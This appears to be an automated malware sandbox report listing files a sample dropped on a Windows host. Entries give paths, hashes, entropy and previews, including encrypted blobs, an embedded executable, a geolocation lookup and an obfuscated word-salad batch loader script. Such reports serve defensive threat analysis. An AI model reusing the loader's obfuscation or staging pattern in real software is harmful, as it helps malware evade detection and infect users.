C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	5.019205124979377
Encrypted:	false
SSDEEP:	12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
MD5:	B62617530A8532F9AECAA939B6AB93BB
SHA1:	E4DE9E9838052597EB2A5B363654C737BA1E6A66
SHA-256:	508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
SHA-512:	A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
Malicious:	false
Preview:	{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Indonesia

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	74752
Entropy (8bit):	6.557400918137722
Encrypted:	false
SSDEEP:	1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
MD5:	15BE985957A02EE4B7D96A3C52FF0016
SHA1:	B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
SHA-256:	E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
SHA-512:	9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
Malicious:	false
Preview:	.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......\|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>\|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Instantly

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	90112
Entropy (8bit):	6.7085176792029815
Encrypted:	false
SSDEEP:	1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
MD5:	7FC8AB46CD562FFA0E11F3A308E63FA7
SHA1:	DD205EA501D6E04EF3217E2D6488DDB6D25F4738
SHA-256:	5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
SHA-512:	25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
Malicious:	false
Preview:	.F..E.9E.rf.}..u,j.Xj.f.E.E.Pj..E.P.u.....I...t8.}..r:.F..F.;}........).U.......M..D.......M..L.-..F.....0.I....M..._^3.[.....]..U..QSV.u.3.W.}....F..F..E...E.;.s?...S.}...Yf;.u(.F.....u.j.[S.e...Yf;.u..F..F....;}.r.....0.I..._..^[..]..U..QV.u.V.J...Y..u.2..XW....?...k.0.....M..D0(.t.......@L.......u......M..\|0).u.2....E.P.....M..t0.....I......_^..]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E..&...f...f...............e......;.s...C<.u..F....G...E.G;.......r......+.......j.PW......PQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[......]..U.............L.3.E..M........?k.0S.]......M.V.u.W.L...E........3.........V..V..u......;.s+.........u..F..j.Zf.....f...E....;.......r......+.......j.P.........WPQ....I...t........F.;.r.............;.r.....0.I....M..._^3.[.......]..U.............L.3.E..M........?k.0SV.....M.3.u.W.D...M..........E......^........^.;...............P...;.s!.........u.j.Zf.....f......M.;.r.SShU.........Q..P...+...P..PSh.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Led

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	147456
Entropy (8bit):	6.70232349488191
Encrypted:	false
SSDEEP:	3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
MD5:	C038EEFE422386831ACF8D9D6898D464
SHA1:	9CF7F3E9A50218D5E03617B793EAE447645E6A90
SHA-256:	1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
SHA-512:	8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
Malicious:	false
Preview:	J..........t.......u5.u../ ..w.tk........)w......E..$...E..._ ..tJ...0..tB..3............L.........E.,K.......K..<. cL.....;M...d....E....E.}....R....M.@.E.;............}..E..............;~\|.............}....}.t...%....=....u .......................}.................L.............M.,K.......K.... cL....t....t..._t.3........;E........E.M.@.E.;...X.........}..E..............;~\|.............}...}..M.t3...M.%....=....u"............%...............}..M.E....@.K....@.K.9U.r..@.;.t'..;.s.}.........E.M.@.E.;...s....<....}..........}..E..............;~\|..%..........}....}.t...%....=....u .............................}...$t&..@t!..`t.......r.......v.......s.3........;E...9....E.M.@.E.;...m.................}..E..........]....F\|.E.;...l..........}....}...E.t6.E..%....=....u%......................}.....E.......U.............L.........E.,K.......K..F\|.M.;..........E.}..........t-..%....=....u...G.......%....................U.............L.........E.,K.......K............1L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Leisure

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	7.997097243867807
Encrypted:	true
SSDEEP:	1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
MD5:	838511D6727BE6237C1E4CD26A0885DE
SHA1:	7A9FFA35532A5817F04CB48C9E154B5C9DE74623
SHA-256:	D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
SHA-512:	AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
Malicious:	false
Preview:	.~. ....)........5a.<......E.Ft.q/.....0....U.......d...l..4MQnM.o.`.bL..s./.<;.l..l.;aG._-.0.."/B.6G/....E!........R.C>N.%...D..y2...z.!....z...i......eT....3....e.z;..1........,..65..I b0n.U....B.#<.5..Q=U..%.%.7a[.\|....`..o-s....QW%....bx.^.....5..<.[p.i.(&y...m.H..qS:.pR.....!..P...o.].]o./..Yb0.H8?A.....V.n.1...%.>..'.......j:<;.?._....u.o..5..g]S.nT...J.K<&..yC..&xn.-..r.7..!.4\..aR."Nh+.........Y..'...I..(r..-..p=..vn...lA..Z7.....Y1.......'.3T.....g..p...."N....w?Y.;.......x}.........\R{........b...........H...o....%..=."....\|>j.f....FA...".z.qt...}...4.q3..b...K....o...-?t0.(....~.......,.C.3#7N.....k..p......l9P.b=qo...y$=P...%s.^.....[w...%.41..X.(.(:.a......_..t=e...$.I...?.!.2..m.e...>.''3..L..H.... .k..4.!.p.L....u..#......\...j......GF..+..K.u.J9&........~CUw..........m.q$V..._..n..9.J{.+f...I.x.z]%~.7A*..rF`......>.w8..z.....x..>X.#5.RO.F.e.B.xpw...q^...2<.71......../c.}.........2.k.^=..Pc...~.e.m.^...s.j..Kd...._.<.7...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Math

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.997538946660952
Encrypted:	true
SSDEEP:	1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
MD5:	7B5C9E82025D184E64A7413174CE1A1C
SHA1:	C552965CE73D43225541932D65C3B4B6342A70E4
SHA-256:	7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
SHA-512:	71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
Malicious:	false
Preview:	/@.......S7....S......L.<.s....0..8....v...$7.9...H..3..r.>:q.w.].B.#v...CU....\..-....,...Y..FUp.RYd...$e...O.7...9/._.J.....u>...K..8@k.......V..y.l.._.W&.Ix.-.}@tQ.~.UT.I.n.O..b..O ..]...a....fN.d..O.[.t.v...1..gt.u...$......`.Q...n;mds...'.o..s..N......NhO.p......a.k.....h.7r..w...FP.yO..2..%?.=.s.7#RA/..Y.f.......u.....JM..........:eR3.V...&..\|}.F.v.m....@...=...V..%.I.vX.x .Iv....p$.+dZ...T...4...(G...ez.O..%...8$;n. ..r7.V3.!...y...t.....Yz.<.??..W...W....tg..>....a.d..}.N.Jp...F.....!c.H.0,j..'#T.4:..q...Lt...n.........Kz.......G.'.)..x..g..."b.W.v\...v.`.\.V...W......~D.....0.(z.H.Y....T....}.`..<..%.Th........!....7.....A+q...?..l.MEHT.2..HW.....g.&.k........6GA.5.^...k..Tv9+k...24....t....5'.K.]..=l{.`..S.^6.<...!.Y.q.tmCYZ...........@O@.U.....qJ9.v^.`=....4aw...t..._ .U.FP..p,..[..7....F..'.\.R}6pI.$.'....Q.........../.H.....p.M9..Y..A!_..i......0.%......3xf..h5.g ......g.\Q.-1.T"...Ta.....]AC..._.2=n.3.`.r%....~.S.f

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Measurement

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	1237
Entropy (8bit):	3.752009061763574
Encrypted:	false
SSDEEP:	12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
MD5:	47FE88841F7CEA67286B6BB812A7A09F
SHA1:	950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
SHA-256:	33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
SHA-512:	C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
Malicious:	false
Preview:	Korea........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B...........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Missed

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	5.9158452815608795
Encrypted:	false
SSDEEP:	1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
MD5:	E6FE42ADC3082D12E845756426492B6E
SHA1:	E1170EE049AB607162D1495B625AA74221AA8585
SHA-256:	BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
SHA-512:	9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
Malicious:	false
Preview:	...?5.h!.....?.......?.......@.........................?..5.h!....>@...............................@................c.c.s...U.T.F.-.8...U.T.F.-.1.6.L.E.U.N.I.C.O.D.E.................................................................................8C......8C......0<......0<..+eG.W@..+eG.W@....B..?....B..?:;.....=:;.....=...t..?Z.fUUU.?...&WU.?{......?.......?.........9..B..@...2b....................................0<..0<.dW..dW................................@.......................................B.......B.................8..B..?0g.W..=.......................................?.......?......................0C......0C................................U....I.?.. ....u}.M.U..UUUUU.?Sz.....?........................................-DT.!.?.-DT.!..RUUUUU.?........v.F.$I.?.........3Y.E.?#Y...q...n.....?..;.9....../I.?hK.........d...?81.U.......H!G.?..#.$.....0\|.f?.K.RVn...TUUUU.?........~I..$I.?.g......HB.;E.?.....q.....{.?.x...................................?...... @...... @.......?

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Next

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	7.9979666143694095
Encrypted:	true
SSDEEP:	1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
MD5:	52C875EB8A3EBC4643094465CDBB08D0
SHA1:	013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
SHA-256:	A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
SHA-512:	97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
Malicious:	false
Preview:	....].Z...%.o....."7.;?..F.....x..=.[......F..&.P.P.f.1.xi$!..H..9..d$...E<.....t.3...........adW2.P.),CG.!f9.x:.."l..C'.......i.......;R........7...m.`..X.mH..T..].Te..c6...........E..u....8..k.#.ac...)..E.N:....B.NX..l..e.."...ytLW.;T.b./w...1TI)..<z."LH%+....R...N..v2...A.s...~.&=..4.....p..,.[v..#..F..-..._.. G,......HA.X.T...U.O[..J...h\|...qX.....i.[a+X........Z..Q..........'Y...J."..:........W.m...e..+....?8/.z.._.........,.N....r.V/Q..N.z14.9....I..B... .S.7...."...'AC..)........Y.]^%r.TPd..k...'b..d.B.:.3.tX4..o%.p ...wNG2^/..i.>..E...^m...\|X...RY.BI.q0.......Kdz.....-.l..b....].y..'..j.C...>...>0.0.[.!.xSk..;7V.......%.O..P...C...'O.sjT..,.S..'-.f..t6.'s.N.Z.^.{\|.8.L.o;,.V...vC...B.p.X(T%..q..T..z..........M.2.....?.MF.........sJ...8.....fp.\....^......."...6 ..Mw... k..v-.....B..$....E.ndEc...."...%...Swiltb....R.....^M../.........@6$c}.K..gp.R.O....s..E.$.d...r;....k.gdK2.(IG[..I...?.v.tfJ..9....+..J.....g.....g.WK.....\

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	ASCII text, with very long lines (975), with CRLF line terminators
Category:	dropped
Size (bytes):	23449
Entropy (8bit):	5.134148367041093
Encrypted:	false
SSDEEP:	384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
MD5:	9EF6EFA272560F1DEE8923508DAFE2C9
SHA1:	7E6572FA616E8FE8AB67D2518F8685EB01F46923
SHA-256:	3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
SHA-512:	D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
Malicious:	false
Preview:	Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Nr.cmd (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (975), with CRLF line terminators
Category:	dropped
Size (bytes):	23449
Entropy (8bit):	5.134148367041093
Encrypted:	false
SSDEEP:	384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
MD5:	9EF6EFA272560F1DEE8923508DAFE2C9
SHA1:	7E6572FA616E8FE8AB67D2518F8685EB01F46923
SHA-256:	3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
SHA-512:	D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
Malicious:	false
Preview:	Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Protocol

Download File

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	43912
Entropy (8bit):	7.0754478586730984
Encrypted:	false
SSDEEP:	768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
MD5:	28E6332970BFF06A0431BFEFBCD59462
SHA1:	20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
SHA-256:	85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
SHA-512:	CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
Malicious:	false
Preview:	..].........`...]...]...]...........0................]...]...]...]...]...]...]...]....................................p...]...]...]...]...p...................................................................................................0.........................0......................................................................................00......h..... ....................(.....00............ ....................h........... .A?....00.... ..%.... .... ............. .h...........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee..................................................................................................................................................................7............................................(.........(....... ...................................z`..y_..M,..6...).......,...:...nnn.jb..ZF..F).._@..9...eee.................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Realm

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	42495
Entropy (8bit):	7.994847286020057
Encrypted:	true
SSDEEP:	768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
MD5:	062E20D07FE052044D9339A8B3F1CB38
SHA1:	5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
SHA-256:	84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
SHA-512:	2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
Malicious:	false
Preview:	.M<..l.v.;. FB.4.h{..I.....jo_..~6s..7..bM.}..V.&.o_Y..k..`.x..q...H....6u.`T."....t.v..D.d\tv..J............{.'....S..)..u.nCb.>.0g.uh'.A4.&#o..J..w...g.......eh.K.z...D)78.6.H.S..aP.]...\|.....f...zDnlM3.......G\.M...3T..Ow.....z-3...Z,..L...k.\@....43.....j... .$r0H........+.....}..o#.h....t.L.U.X.).t....]&..@...I..".it...4..p].F.(,O.".{.>..s-._$...(.%ZKG.o.6xr\|....8.Y...%..J.0.I...P....Io.....1;Z.u..uZ.e..Jr....$.I.{.W..l.....d.@C.`+L. .A.}W..d.X.c..)a.&.P.9 Y....R.R...?o..>......GX.D..i.{.m.?>..<..W+..s8.uK....D...H....Vk.la.X...w..D....t..k.HW....OA....~dU\|^DC....D..>...{.t8,o....l.q.nXu.]=4...K.@[?wpn..nY...Q...A.$..=@G....J.O..H.~..:i....!...w..A=".\|.z.jcm........4T...o.,...c1~..B....Yz...8.5qu.<....H..&....[.n..3.=...-l6Z..s...i,0.......T.{r...F.":. .......j.r-j'3.!....=..iE.oJ.^0;....q/z.]..u"I..X..d..m..Z..L...x....<..g.$...s.*......)..[G.......6.".....f.5.@{..!.+j..yf..iz...=...V.d........6...k.uE]6....Q...mV.i.FU.......v.w..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Substantial

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	58368
Entropy (8bit):	7.996685518527556
Encrypted:	true
SSDEEP:	1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
MD5:	734A793F9424DE731EEE480B610E0257
SHA1:	DD2073F71258FC036517ED503B3F85FD8ECDFDA6
SHA-256:	0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
SHA-512:	194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
Malicious:	false
Preview:	\|U.A&..).?.<.`...D0.3.!=H..Id.,....@r...X...{P.@O.^.G..i.N.d.;k.GjcuuwC.h....E%t.Z..:...T:.s"..',...<.."(._.zk`..\|.U.........L]....{.:.4.....z.!...<..m.3.3..lK..E.u..-..#S.l8.F.G.....B .h.v..99.6P;..a..O.T..eK...q.j:.4...F\B>c.>r{...4..&U......./.qH...@..U..>...6.B...(d.8......`.L.N......r4.e...fp..X.....w....[K.g.\|....om.,.z.Q...fdC..s..n.h...{F.h...,.j].z..?.^.Y.::.-+8....}W.....m..h.Q..Vo..1.g....M......i...R.v3.i29jdc...3\[:..r@.TbPN....pL..Xc.6/T..v..n_..0[........o....TE.`S...N....Kj6hamK...o.0_.H$..... .!a..?u.;.=..C..xp..[.s........O..b.H\|....96h..V....??%......9.8.)..*.4L..J..R...9%..O.'..O= a.6..K.o.......}..F....M5e.....8.p.....kqq...eL.u%.....6.66M'n.Uz.....(...?vz.,.2VB'.....:h.#o.8..~..@.6.?m..5.....8....pFX$..M8.%q......`s...y.Nudh.........R...9W[..>%.6O.X.....G.....@...$../.<j.t2.O@r..x.{._.....c!....d%.".y....I.8I./........'q.F....@.+..h..c....j.x.m..M.q.).].c......q.o...ahn..c.-a......Y..+^.G....@.8.....;H..X..t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Undefined

Download File

Process:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
File Type:	data
Category:	dropped
Size (bytes):	67584
Entropy (8bit):	7.996945320826708
Encrypted:	true
SSDEEP:	1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
MD5:	10CF860D6ED7F8B77D7F02A407DDDE2C
SHA1:	42C54FF8B32BD09B583E544837A65248AF7B60AB
SHA-256:	A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
SHA-512:	355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
Malicious:	false
Preview:	>.m....\qG..........h......y(..].....b8.Bt>f)iW/m..'...=.~Z......?......n.'..1M..w.D.9. .u.y.Ta+...$..Q.v..8........O..X..K.W.....x.".E.."g....9.fk.#.=.....:.OB..7..Tf.4...1AK..}..Y..?..)...V..Jr.v...9...!.2..i.B.!....ji..&.e...Q...;..k..U11.ov..I.....{q.\.T&.#..r.9.(v-r../....}.T......f..J..%.\|u...A..&...S[s....4.j$P..PV..M..s.739$...}..W{.f..&....A..h.....Ye.v......!.+.F.E.1.e...c.....i....D..n.&..g.d....Hx\....b.......N..0.^..O...@j....'..Z.~......w}....g...c....V..b......t..%.....].`@e.`...._......vX.A._....?...Pp.DG.7m.R..4G3@....uy...;L'..II{....M...Fv.[..<.Vm".....P.w.\......%.kY.^.L[..h.s..`..E.>....g..^.. 8...#.[HY@.8.......N.7...m....T...<."}H..3.!.9N$..,.bF.@.......nkP.8.R.-J.~K..<.,...f.vL..........YPA...LHl5\..H....c..G."h..s..X..X.......8...U....,..s`.i......E...o.C'.&+.Lb.&......[t1..>..`t......&`CE.9=..m4..3f\|.Y@X..,.u.C.o~....L.E....2.K..}..;....e....w...U...L...7#.\|..`5g.x<....../.]^.j.,y.#W.....B\.y

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21979
Entropy (8bit):	5.049158677118914
Encrypted:	false
SSDEEP:	384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
MD5:	E85ADBB7806D6C2B446681F25E86C54E
SHA1:	7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
SHA-256:	1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
SHA-512:	D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
Malicious:	false
